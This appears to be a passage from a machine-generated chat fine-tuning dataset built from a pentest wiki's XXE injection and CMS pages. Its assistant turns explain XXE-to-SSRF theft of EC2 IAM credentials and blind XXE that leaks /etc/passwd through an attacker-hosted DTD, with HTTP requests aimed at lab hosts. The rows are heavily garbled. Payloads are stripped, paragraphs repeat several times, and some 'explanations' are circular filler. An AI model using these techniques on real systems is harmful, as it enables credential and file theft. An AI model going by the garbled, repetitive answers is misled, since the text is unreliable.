&newfrom;\n\n`\n\n::: details Example: Get EC2 IAM role temporary credentials\nIn the following example, the attacker tries to access the AWS EC2 metadata service to retrieve the EC2 role credentials used by the server.\n\n`xml\n\n ]>\n&xxe;1\n`\n\nThe internal server will reveal the URL path to access the role's credentials as an error message at each step by displaying the HTTP response body of the accessed URL as follows: \n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/\"\\\n The server will return an error message revealing the EC2 role name: invalid productId ec2-role-name_._\n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/ec2-role-name\"\\\n The server will return an error message revealing the EC2 role's secrets as invalid productId`.\n\nFor more details, refer to the \"XXE to SSRF\" PortSwigger lab.\n:::", "metadata": {"corpus_index": 1950, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for XXE injection - Conduct an SSRF attack"}, {"role": "assistant", "content": "An XXE can be exploited to conduct an SSRF. When an application performs data transfer using XML, the request can be intercepted and forwarded to an internal host as follow.\n\n``xml\n\n ]>\n\n &newfrom;\n\n`\n\n::: details Example: Get EC2 IAM role temporary credentials\nIn the following example, the attacker tries to access the AWS EC2 metadata service to retrieve the EC2 role credentials used by the server.\n\n`xml\n\n ]>\n&xxe;1\n`\n\nThe internal server will reveal the URL path to access the role's credentials as an error message at each step by displaying the HTTP response body of the accessed URL as follows: \n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/\"\\\n The server will return an error message revealing the EC2 role name: invalid productId ec2-role-name_._\n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/ec2-role-name\"\\\n The server will return an error message revealing the EC2 role's secrets as invalid productId`.\n\nFor more details, refer to the \"XXE to SSRF\" PortSwigger lab.\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for XXE injection - Conduct an SSRF attack", "response": "An XXE can be exploited to conduct an SSRF. When an application performs data transfer using XML, the request can be intercepted and forwarded to an internal host as follow.\n\n``xml\n\n ]>\n\n &newfrom;\n\n`\n\n::: details Example: Get EC2 IAM role temporary credentials\nIn the following example, the attacker tries to access the AWS EC2 metadata service to retrieve the EC2 role credentials used by the server.\n\n`xml\n\n ]>\n&xxe;1\n`\n\nThe internal server will reveal the URL path to access the role's credentials as an error message at each step by displaying the HTTP response body of the accessed URL as follows: \n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/\"\\\n The server will return an error message revealing the EC2 role name: invalid productId ec2-role-name_._\n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/ec2-role-name\"\\\n The server will return an error message revealing the EC2 role's secrets as invalid productId`.\n\nFor more details, refer to the \"XXE to SSRF\" PortSwigger lab.\n:::", "metadata": {"corpus_index": 1950, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of XXE injection - Blind XXE"}, {"role": "assistant", "content": "Sometimes, an XXE injection can be found, but the app doesn't return the values of any defined external entities within its responses. It's called a blind XXE.\n\nThere are two ways to find & exploit a blind XXE : \n\n* XML parsing errors can be triggered so that sensitive data is included in the error messages.\n* Out-of-band network interactions can be initiated, sometimes leaking sensitive data into the interaction data such as SSRF attacks."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of XXE injection - Blind XXE", "response": "Sometimes, an XXE injection can be found, but the app doesn't return the values of any defined external entities within its responses. It's called a blind XXE.\n\nThere are two ways to find & exploit a blind XXE : \n\n* XML parsing errors can be triggered so that sensitive data is included in the error messages.\n* Out-of-band network interactions can be initiated, sometimes leaking sensitive data into the interaction data such as SSRF attacks.", "metadata": {"corpus_index": 1951, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do XXE injection - Blind XXE"}, {"role": "assistant", "content": "Sometimes, an XXE injection can be found, but the app doesn't return the values of any defined external entities within its responses. It's called a blind XXE.\n\nThere are two ways to find & exploit a blind XXE : \n\n* XML parsing errors can be triggered so that sensitive data is included in the error messages.\n* Out-of-band network interactions can be initiated, sometimes leaking sensitive data into the interaction data such as SSRF attacks."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do XXE injection - Blind XXE", "response": "Sometimes, an XXE injection can be found, but the app doesn't return the values of any defined external entities within its responses. It's called a blind XXE.\n\nThere are two ways to find & exploit a blind XXE : \n\n* XML parsing errors can be triggered so that sensitive data is included in the error messages.\n* Out-of-band network interactions can be initiated, sometimes leaking sensitive data into the interaction data such as SSRF attacks.", "metadata": {"corpus_index": 1951, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does XXE injection - Blind XXE via error messages work?"}, {"role": "assistant", "content": "It is possible to perform a blind XXE by triggering an XML parsing error where the error message contains the sensitive data that needs to be retrieved.\n\nAn attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows :\n\n``xml\n %xxe;]>\n`\n\nThen, on a victim server, the attacker can submit this payload to get access to the /etc/passwd file:\n\n![](<./assets/ERROR-BASED-BLIND-XXE.png>)\n\nDiagram explaining a blind XXE{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nIf an attacker intercept this request, he will be able to perform a blind error based XXE. First, on the attacker server, prepare the XML payload that will lead to leak /etc/passwd due to an XML parsing error :\n\n`xml\n\n\">\n%eval;\n%exfil;\n`\n\nThen, the attacker will have to perform a out-of-band XXE to call the the payload stored on his exploit server :\n\n`xml\n %xxe;]>\n`\n\nIn the HTTP response, the attacker will have access to the /etc/passwd file of the victim's server that host the shop. Final payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n %xxe;]>\n`\n\nThen, on a victim server, the attacker can submit this payload to get access to the /etc/passwd file:\n\n![](<./assets/ERROR-BASED-BLIND-XXE.png>)\n\nDiagram explaining a blind XXE{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nIf an attacker intercept this request, he will be able to perform a blind error based XXE. First, on the attacker server, prepare the XML payload that will lead to leak /etc/passwd due to an XML parsing error :\n\n`xml\n\n\">\n%eval;\n%exfil;\n`\n\nThen, the attacker will have to perform a out-of-band XXE to call the the payload stored on his exploit server :\n\n`xml\n %xxe;]>\n`\n\nIn the HTTP response, the attacker will have access to the /etc/passwd file of the victim's server that host the shop. Final payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n %xxe;]>\n`\n\nThen, on a victim server, the attacker can submit this payload to get access to the /etc/passwd file:\n\n![](<./assets/ERROR-BASED-BLIND-XXE.png>)\n\nDiagram explaining a blind XXE{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nIf an attacker intercept this request, he will be able to perform a blind error based XXE. First, on the attacker server, prepare the XML payload that will lead to leak /etc/passwd due to an XML parsing error :\n\n`xml\n\n\">\n%eval;\n%exfil;\n`\n\nThen, the attacker will have to perform a out-of-band XXE to call the the payload stored on his exploit server :\n\n`xml\n %xxe;]>\n`\n\nIn the HTTP response, the attacker will have access to the /etc/passwd file of the victim's server that host the shop. Final payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n %xxe;]>\n`\n\nThen, on a victim server, the attacker can submit this payload to get access to the /etc/passwd file:\n\n![](<./assets/ERROR-BASED-BLIND-XXE.png>)\n\nDiagram explaining a blind XXE{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nIf an attacker intercept this request, he will be able to perform a blind error based XXE. First, on the attacker server, prepare the XML payload that will lead to leak /etc/passwd due to an XML parsing error :\n\n`xml\n\n\">\n%eval;\n%exfil;\n`\n\nThen, the attacker will have to perform a out-of-band XXE to call the the payload stored on his exploit server :\n\n`xml\n %xxe;]>\n`\n\nIn the HTTP response, the attacker will have access to the /etc/passwd file of the victim's server that host the shop. Final payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the POST command to xxe injection - blind xxe via error messages", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1953, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "POST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through XXE injection - Blind XXE via error messages"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through XXE injection - Blind XXE via error messages", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1953, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `POST /product/stock HTTP/2`?"}, {"role": "assistant", "content": "This command is used for xxe injection - blind xxe via error messages. Blind XXE via error messages"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `POST /product/stock HTTP/2`?", "response": "This command is used for xxe injection - blind xxe via error messages. Blind XXE via error messages", "metadata": {"corpus_index": 1953, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the POST command for xxe injection - blind xxe via error messages"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n%xxe;\n]>\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the POST command for xxe injection - blind xxe via error messages", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n%xxe;\n]>\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1954, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "POST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for XXE injection - Blind XXE via error messages?"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n%xxe;\n]>\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for XXE injection - Blind XXE via error messages?", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nContent-Length: 107\n\n\n\n \n%xxe;\n]>\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1954, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `POST /product/stock HTTP/2`?"}, {"role": "assistant", "content": "This command is used for xxe injection - blind xxe via error messages. Blind XXE via error messages"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `POST /product/stock HTTP/2`?", "response": "This command is used for xxe injection - blind xxe via error messages. Blind XXE via error messages", "metadata": {"corpus_index": 1954, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does XXE injection - Blind XXE by repurposing a local DTD work?"}, {"role": "assistant", "content": "This type of attack is used when blind out-of-band XXE cannot be performed.\n\nAn attacker can trigger error messages using a loophole in the XML language specification.[^1]\n\nThe attack consists in invoking an existing DTD file (on the local filesystem). Then, redefining the existing entity in a way that triggers a parsing error containing sensitive data like Blind XXE via error messages.\n\n![](<./assets/DTD-REPURPOSING-BLIND-XXE.png>)\n\nDiagram explaining a blind XXE via repurposing a local DTD{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n``http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nAn attacker can edit the request to repurpose a local DTD. The main challenge is to find an existing DTD. \n\nFor example, systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.\n\nKnowing this, the attacker can write this payload that will lead to leak the /etc/passwd file: \n\n`xml\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n`\n\nFinal payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n)\n\nDiagram explaining a blind XXE via repurposing a local DTD{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n``http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nAn attacker can edit the request to repurpose a local DTD. The main challenge is to find an existing DTD. \n\nFor example, systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.\n\nKnowing this, the attacker can write this payload that will lead to leak the /etc/passwd file: \n\n`xml\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n`\n\nFinal payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n)\n\nDiagram explaining a blind XXE via repurposing a local DTD{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n``http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nAn attacker can edit the request to repurpose a local DTD. The main challenge is to find an existing DTD. \n\nFor example, systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.\n\nKnowing this, the attacker can write this payload that will lead to leak the /etc/passwd file: \n\n`xml\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n`\n\nFinal payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n)\n\nDiagram explaining a blind XXE via repurposing a local DTD{.caption}\n\n::: details Example\nIn this example, an attacker has access to a website containing a shop.\n\nThis shop has a \"Check stock\" feature that parses XML input but does not display the result.\n\n``http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n \n 1\n \n \n 1\n \n\n`\n\nAn attacker can edit the request to repurpose a local DTD. The main challenge is to find an existing DTD. \n\nFor example, systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.\n\nKnowing this, the attacker can write this payload that will lead to leak the /etc/passwd file: \n\n`xml\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n`\n\nFinal payload will look like this :\n\n`http\nPOST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the POST syntax for xxe injection - blind xxe by repurposing a local dtd?", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1956, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "POST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do XXE injection - Blind XXE by repurposing a local DTD"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do XXE injection - Blind XXE by repurposing a local DTD", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1956, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `POST /product/stock HTTP/2`?"}, {"role": "assistant", "content": "This command is used for xxe injection - blind xxe by repurposing a local dtd. Blind XXE by repurposing a local DTD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `POST /product/stock HTTP/2`?", "response": "This command is used for xxe injection - blind xxe by repurposing a local dtd. Blind XXE by repurposing a local DTD", "metadata": {"corpus_index": 1956, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the POST command to xxe injection - blind xxe by repurposing a local dtd"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the POST command to xxe injection - blind xxe by repurposing a local dtd", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1957, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "POST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through XXE injection - Blind XXE by repurposing a local DTD"}, {"role": "assistant", "content": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n\n \n 1\n \n \n 1\n \n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through XXE injection - Blind XXE by repurposing a local DTD", "response": "POST /product/stock HTTP/2\nHost: something.web-security-academy.net.com\nCookie: session=bbbbbbbbbbbbbbbbbbbbbbbbbb\nContent-Length: 107\n\n\n\n\n\n\">\n%eval;\n%error;\n'>\n%local_dtd;\n]>\n\n \n 1\n \n \n 1\n \n", "metadata": {"corpus_index": 1957, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `POST /product/stock HTTP/2`?"}, {"role": "assistant", "content": "This command is used for xxe injection - blind xxe by repurposing a local dtd. Blind XXE by repurposing a local DTD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `POST /product/stock HTTP/2`?", "response": "This command is used for xxe injection - blind xxe by repurposing a local dtd. Blind XXE by repurposing a local DTD", "metadata": {"corpus_index": 1957, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Content Management System (CMS) - Theory"}, {"role": "assistant", "content": "A Content Management System (CMS) is a type of software widely used for websites creation and management. It the allows its users to easily create and manage websites such as blogs, forums and online stores. Among web applications, the large usage of CMS makes those software a huge target.\n\nHere is a shortlist of the most common CMS: WordPress, Joomla, Shopify, Drupal, Magento, Typo3."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Content Management System (CMS) - Theory", "response": "A Content Management System (CMS) is a type of software widely used for websites creation and management. It the allows its users to easily create and manage websites such as blogs, forums and online stores. Among web applications, the large usage of CMS makes those software a huge target.\n\nHere is a shortlist of the most common CMS: WordPress, Joomla, Shopify, Drupal, Magento, Typo3.", "metadata": {"corpus_index": 1958, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Content Management System (CMS) - Theory during a pentest?"}, {"role": "assistant", "content": "A Content Management System (CMS) is a type of software widely used for websites creation and management. It the allows its users to easily create and manage websites such as blogs, forums and online stores. Among web applications, the large usage of CMS makes those software a huge target.\n\nHere is a shortlist of the most common CMS: WordPress, Joomla, Shopify, Drupal, Magento, Typo3."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Content Management System (CMS) - Theory during a pentest?", "response": "A Content Management System (CMS) is a type of software widely used for websites creation and management. It the allows its users to easily create and manage websites such as blogs, forums and online stores. Among web applications, the large usage of CMS makes those software a huge target.\n\nHere is a shortlist of the most common CMS: WordPress, Joomla, Shopify, Drupal, Magento, Typo3.", "metadata": {"corpus_index": 1958, "category": "web", "source_file": "docs/src/web/recon/cms.md", "page_title": "Content Management System (CMS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Content Management System 